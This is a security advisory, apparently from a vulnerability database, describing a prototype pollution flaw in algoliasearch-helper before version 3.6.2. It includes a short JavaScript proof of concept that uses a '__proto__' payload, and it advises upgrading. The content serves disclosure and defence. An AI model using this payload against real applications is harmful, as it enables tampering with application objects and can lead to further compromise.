Vulnerability	Vulnerable Version
M Prototype Pollution algoliasearch-helper is a Helper for implementing advanced search features with algolia Affected versions of this package are vulnerable to Prototype Pollution due to use of the `merge` function in `src/SearchParameters/index.js#SearchParameters._parseNumbers` without any protection against prototype properties. Note that this vulnerability is only exploitable if the implementation allows users to define arbitrary search patterns. PoC `// Run npm i algoliasearch-helper, then run the below code const algohelp = require('algoliasearch-helper') var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable to PP"}}'); var test = {}; console.log("Before: " + test.polluted); // Before: undefined algohelp.SearchParameters._parseNumbers(payload); // {} console.log("After: " + test.polluted); // After: vulnerable to PP` How to fix Prototype Pollution? Upgrade `algoliasearch-helper` to version 3.6.2 or higher.	<3.6.2

Prototype Pollution

algoliasearch-helper is a Helper for implementing advanced search features with algolia

Affected versions of this package are vulnerable to Prototype Pollution due to use of the merge function in src/SearchParameters/index.js#SearchParameters._parseNumbers without any protection against prototype properties.

Note that this vulnerability is only exploitable if the implementation allows users to define arbitrary search patterns.

PoC

// Run npm i algoliasearch-helper, then run the below code
const algohelp = require('algoliasearch-helper')
var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable to PP"}}');
var test = {};
console.log("Before: " + test.polluted); // Before: undefined
algohelp.SearchParameters._parseNumbers(payload); // {}
console.log("After: " + test.polluted); // After: vulnerable to PP

How to fix Prototype Pollution?

Upgrade algoliasearch-helper to version 3.6.2 or higher.

<3.6.2

Go back to all versions of this package